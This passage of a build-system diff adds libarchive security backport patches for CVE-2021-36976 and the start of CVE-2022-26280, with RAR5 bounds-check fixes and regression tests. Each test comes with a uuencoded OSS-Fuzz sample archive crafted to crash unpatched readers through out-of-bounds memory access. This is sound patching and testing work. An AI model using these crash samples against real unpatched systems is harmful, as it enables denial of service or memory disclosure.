127 | + struct archive *ad; | ||
128 | + struct archive_entry *ae; | ||
129 | + int r; | ||
130 | + | ||
131 | + if (!canSymlink()) { | ||
132 | + skipping("Symlinks not supported"); | ||
133 | + return; | ||
134 | + } | ||
135 | + | ||
136 | + /* Write entries to disk. */ | ||
137 | + assert((ad = archive_write_disk_new()) != NULL); | ||
138 | + | ||
139 | + /* | ||
140 | + * Create a file | ||
141 | + */ | ||
142 | + assertMakeFile("victim", 0600, "a"); | ||
143 | + | ||
144 | + /* | ||
145 | + * Create a directory and a symlink with the same name | ||
146 | + */ | ||
147 | + | ||
148 | + /* Directory: dir */ | ||
149 | + assert((ae = archive_entry_new()) != NULL); | ||
150 | + archive_entry_copy_pathname(ae, "dir"); | ||
151 | + archive_entry_set_mode(ae, AE_IFDIR | 0606); | ||
152 | + assertEqualIntA(ad, 0, archive_write_header(ad, ae)); | ||
153 | + assertEqualIntA(ad, 0, archive_write_finish_entry(ad)); | ||
154 | + archive_entry_free(ae); | ||
155 | + | ||
156 | + /* Symbolic Link: dir -> foo */ | ||
157 | + assert((ae = archive_entry_new()) != NULL); | ||
158 | + archive_entry_copy_pathname(ae, "dir"); | ||
159 | + archive_entry_set_mode(ae, AE_IFLNK | 0777); | ||
160 | + archive_entry_set_size(ae, 0); | ||
161 | + archive_entry_copy_symlink(ae, "victim"); | ||
162 | + assertEqualIntA(ad, 0, r = archive_write_header(ad, ae)); | ||
163 | + if (r >= ARCHIVE_WARN) | ||
164 | + assertEqualIntA(ad, 0, archive_write_finish_entry(ad)); | ||
165 | + archive_entry_free(ae); | ||
166 | + | ||
167 | + assertEqualInt(ARCHIVE_OK, archive_write_free(ad)); | ||
168 | + | ||
169 | + /* Test the entries on disk. */ | ||
170 | + assertIsSymlink("dir", "victim", 0); | ||
171 | + assertFileMode("victim", 0600); | ||
172 | +} | ||
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch new file mode 100644 index 0000000000..fca53fc9b6 --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch | |||
@@ -0,0 +1,321 @@ | |||
1 | From 05ebb55896d10a9737dad9ae0303f7f45489ba6f Mon Sep 17 00:00:00 2001 | ||
2 | From: Grzegorz Antoniak <ga@anadoxin.org> | ||
3 | Date: Sat, 13 Feb 2021 09:08:13 +0100 | ||
4 | Subject: [PATCH] RAR5 reader: fixed out of bounds read in some files | ||
5 | |||
6 | Added more range checks in the bit stream reading functions | ||
7 | (read_bits_16 and read_bits_32) in order to better guard against out of | ||
8 | memory reads. | ||
9 | |||
10 | This commit contains a test with OSSFuzz sample #30448. | ||
11 | |||
12 | Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-1.patch?h=applied/3.4.3-2ubuntu0.1] | ||
13 | CVE: CVE-2021-36976 | ||
14 | Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com> | ||
15 | --- | ||
16 | Makefile.am | 1 + | ||
17 | libarchive/archive_read_support_format_rar5.c | 108 ++++++++++-------- | ||
18 | libarchive/test/test_read_format_rar5.c | 16 +++ | ||
19 | ...r5_decode_number_out_of_bounds_read.rar.uu | 10 ++ | ||
20 | 4 files changed, 89 insertions(+), 46 deletions(-) | ||
21 | create mode 100644 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu | ||
22 | |||
23 | --- a/Makefile.am | ||
24 | +++ b/Makefile.am | ||
25 | @@ -883,6 +883,7 @@ libarchive_test_EXTRA_DIST=\ | ||
26 | libarchive/test/test_read_format_rar5_arm_filter_on_window_boundary.rar.uu \ | ||
27 | libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \ | ||
28 | libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \ | ||
29 | + libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \ | ||
30 | libarchive/test/test_read_format_raw.bufr.uu \ | ||
31 | libarchive/test/test_read_format_raw.data.gz.uu \ | ||
32 | libarchive/test/test_read_format_raw.data.Z.uu \ | ||
33 | --- a/libarchive/archive_read_support_format_rar5.c | ||
34 | +++ b/libarchive/archive_read_support_format_rar5.c | ||
35 | @@ -1012,7 +1012,16 @@ static int read_var_sized(struct archive | ||
36 | return ret; | ||
37 | } | ||
38 | |||
39 | -static int read_bits_32(struct rar5* rar, const uint8_t* p, uint32_t* value) { | ||
40 | +static int read_bits_32(struct archive_read* a, struct rar5* rar, | ||
41 | + const uint8_t* p, uint32_t* value) | ||
42 | +{ | ||
43 | + if(rar->bits.in_addr >= rar->cstate.cur_block_size) { | ||
44 | + archive_set_error(&a->archive, | ||
45 | + ARCHIVE_ERRNO_PROGRAMMER, | ||
46 | + "Premature end of stream during extraction of data (#1)"); | ||
47 | + return ARCHIVE_FATAL; | ||
48 | + } | ||
49 | + | ||
50 | uint32_t bits = ((uint32_t) p[rar->bits.in_addr]) << 24; | ||
51 | bits |= p[rar->bits.in_addr + 1] << 16; | ||
52 | bits |= p[rar->bits.in_addr + 2] << 8; | ||
53 | @@ -1023,7 +1032,16 @@ static int read_bits_32(struct rar5* rar | ||
54 | return ARCHIVE_OK; | ||
55 | } | ||
56 | |||
57 | -static int read_bits_16(struct rar5* rar, const uint8_t* p, uint16_t* value) { | ||
58 | +static int read_bits_16(struct archive_read* a, struct rar5* rar, | ||
59 | + const uint8_t* p, uint16_t* value) | ||
60 | +{ | ||
61 | + if(rar->bits.in_addr >= rar->cstate.cur_block_size) { | ||
62 | + archive_set_error(&a->archive, | ||
63 | + ARCHIVE_ERRNO_PROGRAMMER, | ||
64 | + "Premature end of stream during extraction of data (#2)"); | ||
65 | + return ARCHIVE_FATAL; | ||
66 | + } | ||
67 | + | ||
68 | int bits = (int) ((uint32_t) p[rar->bits.in_addr]) << 16; | ||
69 | bits |= (int) p[rar->bits.in_addr + 1] << 8; | ||
70 | bits |= (int) p[rar->bits.in_addr + 2]; | ||
71 | @@ -1039,8 +1057,8 @@ static void skip_bits(struct rar5* rar, | ||
72 | } | ||
73 | |||
74 | /* n = up to 16 */ | ||
75 | -static int read_consume_bits(struct rar5* rar, const uint8_t* p, int n, | ||
76 | - int* value) | ||
77 | +static int read_consume_bits(struct archive_read* a, struct rar5* rar, | ||
78 | + const uint8_t* p, int n, int* value) | ||
79 | { | ||
80 | uint16_t v; | ||
81 | int ret, num; | ||
82 | @@ -1051,7 +1069,7 @@ static int read_consume_bits(struct rar5 | ||
83 | return ARCHIVE_FATAL; | ||
84 | } | ||
85 | |||
86 | - ret = read_bits_16(rar, p, &v); | ||
87 | + ret = read_bits_16(a, rar, p, &v); | ||
88 | if(ret != ARCHIVE_OK) | ||
89 | return ret; | ||
90 | |||
91 | @@ -2425,13 +2443,13 @@ static int create_decode_tables(uint8_t* | ||
92 | static int decode_number(struct archive_read* a, struct decode_table* table, | ||
93 | const uint8_t* p, uint16_t* num) | ||
94 | { | ||
95 | - int i, bits, dist; | ||
96 | + int i, bits, dist, ret; | ||
97 | uint16_t bitfield; | ||
98 | uint32_t pos; | ||
99 | struct rar5* rar = get_context(a); | ||
100 | |||
101 | - if(ARCHIVE_OK != read_bits_16(rar, p, &bitfield)) { | ||
102 | - return ARCHIVE_EOF; | ||
103 | + if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &bitfield))) { | ||
104 | + return ret; | ||
105 | } | ||
106 | |||
107 | bitfield &= 0xfffe; | ||
108 | @@ -2537,14 +2555,6 @@ static int parse_tables(struct archive_r | ||
109 | for(i = 0; i < HUFF_TABLE_SIZE;) { | ||
110 | uint16_t num; | ||
111 | |||
112 | - if((rar->bits.in_addr + 6) >= rar->cstate.cur_block_size) { | ||
113 | - /* Truncated data, can't continue. */ | ||
114 | - archive_set_error(&a->archive, | ||
115 | - ARCHIVE_ERRNO_FILE_FORMAT, | ||
116 | - "Truncated data in huffman tables (#2)"); | ||
117 | - return ARCHIVE_FATAL; | ||
118 | - } | ||
119 | - | ||
120 | ret = decode_number(a, &rar->cstate.bd, p, &num); | ||
121 | if(ret != ARCHIVE_OK) { | ||
122 | archive_set_error(&a->archive, | ||
123 | @@ -2561,8 +2571,8 @@ static int parse_tables(struct archive_r | ||
124 | /* 16..17: repeat previous code */ | ||
125 | uint16_t n; | ||
126 | |||
127 | - if(ARCHIVE_OK != read_bits_16(rar, p, &n)) | ||
128 | - return ARCHIVE_EOF; | ||
129 | + if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n))) | ||
130 | + return ret; | ||
131 | |||
132 | if(num == 16) { | ||
133 | n >>= 13; | ||
134 | @@ -2590,8 +2600,8 @@ static int parse_tables(struct archive_r | ||
135 | /* other codes: fill with zeroes `n` times */ | ||
136 | uint16_t n; | ||
137 | |||
138 | - if(ARCHIVE_OK != read_bits_16(rar, p, &n)) | ||
139 | - return ARCHIVE_EOF; | ||
140 | + if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n))) | ||
141 | + return ret; | ||
142 | |||
143 | if(num == 18) { | ||
144 | n >>= 13; | ||
145 | @@ -2707,22 +2717,22 @@ static int parse_block_header(struct arc | ||
146 | } | ||
147 | |||
148 | /* Convenience function used during filter processing. */ | ||
149 | -static int parse_filter_data(struct rar5* rar, const uint8_t* p, | ||
150 | - uint32_t* filter_data) | ||
151 | +static int parse_filter_data(struct archive_read* a, struct rar5* rar, | ||
152 | + const uint8_t* p, uint32_t* filter_data) | ||
153 | { | ||
154 | - int i, bytes; | ||
155 | + int i, bytes, ret; | ||
156 | uint32_t data = 0; | ||
157 | |||
158 | - if(ARCHIVE_OK != read_consume_bits(rar, p, 2, &bytes)) | ||
159 | - return ARCHIVE_EOF; | ||
160 | + if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, p, 2, &bytes))) | ||
161 | + return ret; | ||
162 | |||
163 | bytes++; | ||
164 | |||
165 | for(i = 0; i < bytes; i++) { | ||
166 | uint16_t byte; | ||
167 | |||
168 | - if(ARCHIVE_OK != read_bits_16(rar, p, &byte)) { | ||
169 | - return ARCHIVE_EOF; | ||
170 | + if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &byte))) { | ||
171 | + return ret; | ||
172 | } | ||
173 | |||
174 | /* Cast to uint32_t will ensure the shift operation will not | ||
175 | @@ -2765,16 +2775,17 @@ static int parse_filter(struct archive_r | ||
176 | uint16_t filter_type; | ||
177 | struct filter_info* filt = NULL; | ||
178 | struct rar5* rar = get_context(ar); | ||
179 | + int ret; | ||
180 | |||
181 | /* Read the parameters from the input stream. */ | ||
182 | - if(ARCHIVE_OK != parse_filter_data(rar, p, &block_start)) | ||
183 | - return ARCHIVE_EOF; | ||
184 | + if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_start))) | ||
185 | + return ret; | ||
186 | |||
187 | - if(ARCHIVE_OK != parse_filter_data(rar, p, &block_length)) | ||
188 | - return ARCHIVE_EOF; | ||
189 | + if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_length))) | ||
190 | + return ret; | ||
191 | |||
192 | - if(ARCHIVE_OK != read_bits_16(rar, p, &filter_type)) | ||
193 | - return ARCHIVE_EOF; | ||
194 | + if(ARCHIVE_OK != (ret = read_bits_16(ar, rar, p, &filter_type))) | ||
195 | + return ret; | ||
196 | |||
197 | filter_type >>= 13; | ||
198 | skip_bits(rar, 3); | ||
199 | @@ -2814,8 +2825,8 @@ static int parse_filter(struct archive_r | ||
200 | if(filter_type == FILTER_DELTA) { | ||
201 | int channels; | ||
202 | |||
203 | - if(ARCHIVE_OK != read_consume_bits(rar, p, 5, &channels)) | ||
204 | - return ARCHIVE_EOF; | ||
205 | + if(ARCHIVE_OK != (ret = read_consume_bits(ar, rar, p, 5, &channels))) | ||
206 | + return ret; | ||
207 | |||
208 | filt->channels = channels + 1; | ||
209 | } | ||
210 | @@ -2823,10 +2834,11 @@ static int parse_filter(struct archive_r | ||
211 | return ARCHIVE_OK; | ||
212 | } | ||
213 | |||
214 | -static int decode_code_length(struct rar5* rar, const uint8_t* p, | ||
215 | - uint16_t code) | ||
216 | +static int decode_code_length(struct archive_read* a, struct rar5* rar, | ||
217 | + const uint8_t* p, uint16_t code) | ||
218 | { | ||
219 | int lbits, length = 2; | ||
220 | + | ||
221 | if(code < 8) { | ||
222 | lbits = 0; | ||
223 | length += code; | ||
224 | @@ -2838,7 +2850,7 @@ static int decode_code_length(struct rar | ||
225 | if(lbits > 0) { | ||
226 | int add; | ||
227 | |||
228 | - if(ARCHIVE_OK != read_consume_bits(rar, p, lbits, &add)) | ||
229 | + if(ARCHIVE_OK != read_consume_bits(a, rar, p, lbits, &add)) | ||
230 | return -1; | ||
231 | |||
232 | length += add; | ||
233 | @@ -2933,7 +2945,7 @@ static int do_uncompress_block(struct ar | ||
234 | continue; | ||
235 | } else if(num >= 262) { | ||
236 | uint16_t dist_slot; | ||
237 | - int len = decode_code_length(rar, p, num - 262), | ||
238 | + int len = decode_code_length(a, rar, p, num - 262), | ||
239 | dbits, | ||
240 | dist = 1; | ||
241 | |||
242 | @@ -2975,12 +2987,12 @@ static int do_uncompress_block(struct ar | ||
243 | uint16_t low_dist; | ||
244 | |||
245 | if(dbits > 4) { | ||
246 | - if(ARCHIVE_OK != read_bits_32( | ||
247 | - rar, p, &add)) { | ||
248 | + if(ARCHIVE_OK != (ret = read_bits_32( | ||
249 | + a, rar, p, &add))) { | ||
250 | /* Return EOF if we | ||
251 | * can't read more | ||
252 | * data. */ | ||
253 | - return ARCHIVE_EOF; | ||
254 | + return ret; | ||
255 | } | ||
256 | |||
257 | skip_bits(rar, dbits - 4); | ||
258 | @@ -3015,11 +3027,11 @@ static int do_uncompress_block(struct ar | ||
259 | /* dbits is one of [0,1,2,3] */ | ||
260 | int add; | ||
261 | |||
262 | - if(ARCHIVE_OK != read_consume_bits(rar, | ||
263 | - p, dbits, &add)) { | ||
264 | + if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, | ||
265 | + p, dbits, &add))) { | ||
266 | /* Return EOF if we can't read | ||
267 | * more data. */ | ||
268 | - return ARCHIVE_EOF; | ||
269 | + return ret; | ||
270 | } | ||
271 | |||
272 | dist += add; | ||
273 | @@ -3076,7 +3088,11 @@ static int do_uncompress_block(struct ar | ||
274 | return ARCHIVE_FATAL; | ||
275 | } | ||
276 | |||
277 | - len = decode_code_length(rar, p, len_slot); | ||
278 | + len = decode_code_length(a, rar, p, len_slot); | ||
279 | + if (len == -1) { | ||
280 | + return ARCHIVE_FATAL; | ||
281 | + } | ||
282 | + | ||
283 | rar->cstate.last_len = len; | ||
284 | |||
285 | if(ARCHIVE_OK != copy_string(a, len, dist)) | ||
286 | --- a/libarchive/test/test_read_format_rar5.c | ||
287 | +++ b/libarchive/test/test_read_format_rar5.c | ||
288 | @@ -1271,3 +1271,20 @@ DEFINE_TEST(test_read_format_rar5_block_ | ||
289 | |||
290 | EPILOGUE(); | ||
291 | } | ||
292 | + | ||
293 | +DEFINE_TEST(test_read_format_rar5_decode_number_out_of_bounds_read) | ||
294 | +{ | ||
295 | + /* oss fuzz 30448 */ | ||
296 | + | ||
297 | + char buf[4096]; | ||
298 | + PROLOGUE("test_read_format_rar5_decode_number_out_of_bounds_read.rar"); | ||
299 | + | ||
300 | + /* Return codes of those calls are ignored, because this sample file | ||
301 | + * is invalid. However, the unpacker shouldn't produce any SIGSEGV | ||
302 | + * errors during processing. */ | ||
303 | + | ||
304 | + (void) archive_read_next_header(a, &ae); | ||
305 | + while(0 < archive_read_data(a, buf, sizeof(buf))) {} | ||
306 | + | ||
307 | + EPILOGUE(); | ||
308 | +} | ||
309 | --- /dev/null | ||
310 | +++ b/libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu | ||
311 | @@ -0,0 +1,10 @@ | ||
312 | +begin 644 test_read_format_rar5_decode_number_out_of_bounds_read.rar | ||
313 | +M4F%R(1H'`0!3@"KT`P+G(@(0("`@@`L!!"`@("`@(($D_[BJ2"!::7!)210V | ||
314 | +M+0#ZF#)Q!`+>YPW_("`@("``_R````````````````````````````!__P`` | ||
315 | +M``````!T72`@/EW_(/\@("`@("`@("`@("`@("`@("`@("`@("`@(/\@("`@ | ||
316 | +M("`@("#_("`@("`@("`@("`@("`@("`@("`@("`@("#_("`@("`@("`@_R`@ | ||
317 | +M("`@("`@("`@("`@("`@("`@("`@("`@_R`@("`@("`@(/\@("`@("`@("`@ | ||
318 | +M("`@("`@("`@("`@("`@(/\@("`@("`@("#_("`@("`@("`@("`@("`@("`@ | ||
319 | +E("`@("`@("#_("`@("`@("`@_R`@("`@("`@("`@("`@("`@(``` | ||
320 | +` | ||
321 | +end | ||
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch new file mode 100644 index 0000000000..b5da44ec7b --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch | |||
@@ -0,0 +1,121 @@ | |||
1 | From 17f4e83c0f0fc3bacf4b2bbacb01f987bb5aff5f Mon Sep 17 00:00:00 2001 | ||
2 | From: Grzegorz Antoniak <ga@anadoxin.org> | ||
3 | Date: Fri, 12 Feb 2021 20:18:31 +0100 | ||
4 | Subject: [PATCH] RAR5 reader: fix invalid memory access in some files | ||
5 | |||
6 | RAR5 reader uses several variables to manage the window buffer during | ||
7 | extraction: the buffer itself (`window_buf`), the current size of the | ||
8 | window buffer (`window_size`), and a helper variable (`window_mask`) | ||
9 | that is used to constrain read and write offsets to the window buffer. | ||
10 | |||
11 | Some specially crafted files can force the unpacker to update the | ||
12 | `window_mask` variable to a value that is out of sync with current | ||
13 | buffer size. If the `window_mask` will be bigger than the actual buffer | ||
14 | size, then an invalid access operation can happen (SIGSEGV). | ||
15 | |||
16 | This commit ensures that if the `window_size` and `window_mask` will be | ||
17 | changed, the window buffer will be reallocated to the proper size, so no | ||
18 | invalid memory operation should be possible. | ||
19 | |||
20 | This commit contains a test file from OSSFuzz #30442. | ||
21 | |||
22 | Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-2.patch?h=applied/3.4.3-2ubuntu0.1] | ||
23 | CVE: CVE-2021-36976 | ||
24 | Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com> | ||
25 | |||
26 | --- | ||
27 | Makefile.am | 1 + | ||
28 | libarchive/archive_read_support_format_rar5.c | 27 ++++++++++++++----- | ||
29 | libarchive/test/test_read_format_rar5.c | 17 ++++++++++++ | ||
30 | ...mat_rar5_window_buf_and_size_desync.rar.uu | 11 ++++++++ | ||
31 | 4 files changed, 50 insertions(+), 6 deletions(-) | ||
32 | create mode 100644 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu | ||
33 | |||
34 | --- a/Makefile.am | ||
35 | +++ b/Makefile.am | ||
36 | @@ -884,6 +884,7 @@ libarchive_test_EXTRA_DIST=\ | ||
37 | libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \ | ||
38 | libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \ | ||
39 | libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \ | ||
40 | + libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \ | ||
41 | libarchive/test/test_read_format_raw.bufr.uu \ | ||
42 | libarchive/test/test_read_format_raw.data.gz.uu \ | ||
43 | libarchive/test/test_read_format_raw.data.Z.uu \ | ||
44 | --- a/libarchive/archive_read_support_format_rar5.c | ||
45 | +++ b/libarchive/archive_read_support_format_rar5.c | ||
46 | @@ -1730,14 +1730,29 @@ static int process_head_file(struct arch | ||
47 | } | ||
48 | } | ||
49 | |||
50 | - /* If we're currently switching volumes, ignore the new definition of | ||
51 | - * window_size. */ | ||
52 | - if(rar->cstate.switch_multivolume == 0) { | ||
53 | - /* Values up to 64M should fit into ssize_t on every | ||
54 | - * architecture. */ | ||
55 | - rar->cstate.window_size = (ssize_t) window_size; | ||
56 | + if(rar->cstate.window_size < (ssize_t) window_size && | ||
57 | + rar->cstate.window_buf) | ||
58 | + { | ||
59 | + /* If window_buf has been allocated before, reallocate it, so | ||
60 | + * that its size will match new window_size. */ | ||
61 | + | ||
62 | + uint8_t* new_window_buf = | ||
63 | + realloc(rar->cstate.window_buf, window_size); | ||
64 | + | ||
65 | + if(!new_window_buf) { | ||
66 | + archive_set_error(&a->archive, ARCHIVE_ERRNO_PROGRAMMER, | ||
67 | + "Not enough memory when trying to realloc the window " | ||
68 | + "buffer."); | ||
69 | + return ARCHIVE_FATAL; | ||
70 | + } | ||
71 | + | ||
72 | + rar->cstate.window_buf = new_window_buf; | ||
73 | } | ||
74 | |||
75 | + /* Values up to 64M should fit into ssize_t on every | ||
76 | + * architecture. */ | ||
77 | + rar->cstate.window_size = (ssize_t) window_size; | ||
78 | + | ||
79 | if(rar->file.solid > 0 && rar->file.solid_window_size == 0) { | ||
80 | /* Solid files have to have the same window_size across | ||
81 | whole archive. Remember the window_size parameter | ||
82 | --- a/libarchive/test/test_read_format_rar5.c | ||
83 | +++ b/libarchive/test/test_read_format_rar5.c | ||
84 | @@ -1206,6 +1206,23 @@ DEFINE_TEST(test_read_format_rar5_differ | ||
85 | EPILOGUE(); | ||
86 | } | ||
87 | |||
88 | +DEFINE_TEST(test_read_format_rar5_window_buf_and_size_desync) | ||
89 | +{ | ||
90 | + /* oss fuzz 30442 */ | ||
91 | + | ||
92 | + char buf[4096]; | ||
93 | + PROLOGUE("test_read_format_rar5_window_buf_and_size_desync.rar"); | ||
94 | + | ||
95 | + /* Return codes of those calls are ignored, because this sample file | ||
96 | + * is invalid. However, the unpacker shouldn't produce any SIGSEGV | ||
97 | + * errors during processing. */ | ||
98 | + | ||
99 | + (void) archive_read_next_header(a, &ae); | ||
100 | + while(0 < archive_read_data(a, buf, 46)) {} | ||
101 | + | ||
102 | + EPILOGUE(); | ||
103 | +} | ||
104 | + | ||
105 | DEFINE_TEST(test_read_format_rar5_arm_filter_on_window_boundary) | ||
106 | { | ||
107 | char buf[4096]; | ||
108 | --- /dev/null | ||
109 | +++ b/libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu | ||
110 | @@ -0,0 +1,11 @@ | ||
111 | +begin 644 test_read_format_rar5_window_buf_and_size_desync.rar | ||
112 | +M4F%R(1H'`0`]/-[E`@$`_P$`1#[Z5P("`PL``BXB"?\`!(@B@0`)6.-AF?_1 | ||
113 | +M^0DI&0GG(F%R(0<:)`!3@"KT`P+G(@O_X[\``#&``(?!!0$$[:L``$.M*E)A | ||
114 | +M<B$`O<\>P0";/P1%``A*2DI*2DYQ<6TN9'%*2DI*2DI*``!D<F--``````"Z | ||
115 | +MNC*ZNKJZNFYO=&%I;+JZNKJZNKJZOKJZ.KJZNKJZNKKZU@4%````0$!`0$!` | ||
116 | +M0$!`0$!`0$!`0$#_________/T#`0$!`0$!`-UM`0$!`0$!`0$!`0$!`0$!` | ||
117 | +M0$!`0'!,J+:O!IZ-WN4'@`!3*F0````````````````````````````````` | ||
118 | +M``````````````#T`P)287(A&@<!`%.`*O0#`N<B`_,F@`'[__\``(`4`01S | ||
119 | +J'`/H/O\H@?\D`#O9GIZ>GN<B"_]%``(``&1RGIZ>GIZ>8_^>GE/_``!. | ||
120 | +` | ||
121 | +end | ||
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch new file mode 100644 index 0000000000..0e1549f229 --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch | |||
@@ -0,0 +1,93 @@ | |||
1 | From 313bcd7ac547f7cc25945831f63507420c0874d7 Mon Sep 17 00:00:00 2001 | ||
2 | From: Grzegorz Antoniak <ga@anadoxin.org> | ||
3 | Date: Sat, 13 Feb 2021 10:13:22 +0100 | ||
4 | Subject: [PATCH] RAR5 reader: add more checks for invalid extraction | ||
5 | parameters | ||
6 | |||
7 | Some specially crafted files declare invalid extraction parameters that | ||
8 | can confuse the RAR5 reader. | ||
9 | |||
10 | One of the arguments is the declared window size parameter that the | ||
11 | archive file can declare for each file stored in the archive. Some | ||
12 | crafted files declare window size equal to 0, which is clearly wrong. | ||
13 | |||
14 | This commit adds additional safety checks decreasing the tolerance of | ||
15 | the RAR5 format. | ||
16 | |||
17 | This commit also contains OSSFuzz sample #30459. | ||
18 | --- | ||
19 | Makefile.am | 1 + | ||
20 | libarchive/archive_read_support_format_rar5.c | 10 ++++++++++ | ||
21 | libarchive/test/test_read_format_rar5.c | 19 +++++++++++++++++++ | ||
22 | ...t_rar5_bad_window_sz_in_mltarc_file.rar.uu | 7 +++++++ | ||
23 | 4 files changed, 37 insertions(+) | ||
24 | create mode 100644 libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu | ||
25 | |||
26 | Upstream-Status: Backport [https://github.com/libarchive/libarchive/pull/1493/commits/313bcd7ac547f7cc25945831f63507420c0874d7] | ||
27 | CVE: CVE-2021-36976 | ||
28 | Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com> | ||
29 | |||
30 | --- libarchive-3.4.2.orig/Makefile.am | ||
31 | +++ libarchive-3.4.2/Makefile.am | ||
32 | @@ -882,6 +882,7 @@ libarchive_test_EXTRA_DIST=\ | ||
33 | libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \ | ||
34 | libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \ | ||
35 | libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \ | ||
36 | + libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu \ | ||
37 | libarchive/test/test_read_format_raw.bufr.uu \ | ||
38 | libarchive/test/test_read_format_raw.data.gz.uu \ | ||
39 | libarchive/test/test_read_format_raw.data.Z.uu \ | ||
40 | --- libarchive-3.4.2.orig/libarchive/archive_read_support_format_rar5.c | ||
41 | +++ libarchive-3.4.2/libarchive/archive_read_support_format_rar5.c | ||
42 | @@ -3637,6 +3637,16 @@ static int do_uncompress_file(struct arc | ||
43 | rar->cstate.initialized = 1; | ||
44 | } | ||
45 | |||
46 | + /* Don't allow extraction if window_size is invalid. */ | ||
47 | + if(rar->cstate.window_size == 0) { | ||
48 | + archive_set_error(&a->archive, | ||
49 | + ARCHIVE_ERRNO_FILE_FORMAT, | ||
50 | + "Invalid window size declaration in this file"); | ||
51 | + | ||
52 | + /* This should never happen in valid files. */ | ||
53 | + return ARCHIVE_FATAL; | ||
54 | + } | ||
55 | + | ||
56 | if(rar->cstate.all_filters_applied == 1) { | ||
57 | /* We use while(1) here, but standard case allows for just 1 | ||
58 | * iteration. The loop will iterate if process_block() didn't | ||
59 | --- libarchive-3.4.2.orig/libarchive/test/test_read_format_rar5.c | ||
60 | +++ libarchive-3.4.2/libarchive/test/test_read_format_rar5.c | ||
61 | @@ -1305,3 +1305,22 @@ DEFINE_TEST(test_read_format_rar5_decode | ||
62 | |||
63 | EPILOGUE(); | ||
64 | } | ||
65 | + | ||
66 | +DEFINE_TEST(test_read_format_rar5_bad_window_size_in_multiarchive_file) | ||
67 | +{ | ||
68 | + /* oss fuzz 30459 */ | ||
69 | + | ||
70 | + char buf[4096]; | ||
71 | + PROLOGUE("test_read_format_rar5_bad_window_sz_in_mltarc_file.rar"); | ||
72 | + | ||
73 | + /* This file is damaged, so those functions should return failure. | ||
74 | + * Additionally, SIGSEGV shouldn't be raised during execution | ||
75 | + * of those functions. */ | ||
76 | + | ||
77 | + (void) archive_read_next_header(a, &ae); | ||
78 | + while(0 < archive_read_data(a, buf, sizeof(buf))) {} | ||
79 | + (void) archive_read_next_header(a, &ae); | ||
80 | + while(0 < archive_read_data(a, buf, sizeof(buf))) {} | ||
81 | + | ||
82 | + EPILOGUE(); | ||
83 | +} | ||
84 | --- /dev/null | ||
85 | +++ libarchive-3.4.2/libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu | ||
86 | @@ -0,0 +1,7 @@ | ||
87 | +begin 644 test_read_format_rar5_bad_window_size_in_multiarchive_file.rar | ||
88 | +M4F%R(1H'`0`]/-[E`@$`_R`@1#[Z5P("`PL`("`@@"(`"?\@("#___\@("`@ | ||
89 | +M("`@("`@("`@4X`J]`,"YR(#$($@("`@``$@("`@@<L0("`@("`@("`@("`@ | ||
90 | +M("`@(""LCTJA`P$%`B`@`2!3@"KT`P+G(@,@("`@_P,!!B`@(/___R`@(('+ | ||
91 | +5$"`OX2`@[.SL[.S_("`@("`@("`@ | ||
92 | +` | ||
93 | +end | ||
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch new file mode 100644 index 0000000000..501fcc5848 --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch | |||
@@ -0,0 +1,29 @@ | |||
1 | From cfaa28168a07ea4a53276b63068f94fce37d6aff Mon Sep 17 00:00:00 2001 | ||
2 | From: Tim Kientzle <kientzle@acm.org> | ||
3 | Date: Thu, 24 Mar 2022 10:35:00 +0100 | ||
4 | Subject: [PATCH] ZIP reader: fix possible out-of-bounds read in | ||
5 | zipx_lzma_alone_init() | ||
6 | |||
7 | Fixes #1672 | ||
8 | |||
9 | CVE: CVE-2022-26280 | ||
10 | Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/cfaa28168a07ea4a53276b63068f94fce37d6aff] | ||
11 | Signed-off-by: Andrej Valek <andrej.valek@siemens.com> | ||
12 | |||
13 | --- | ||
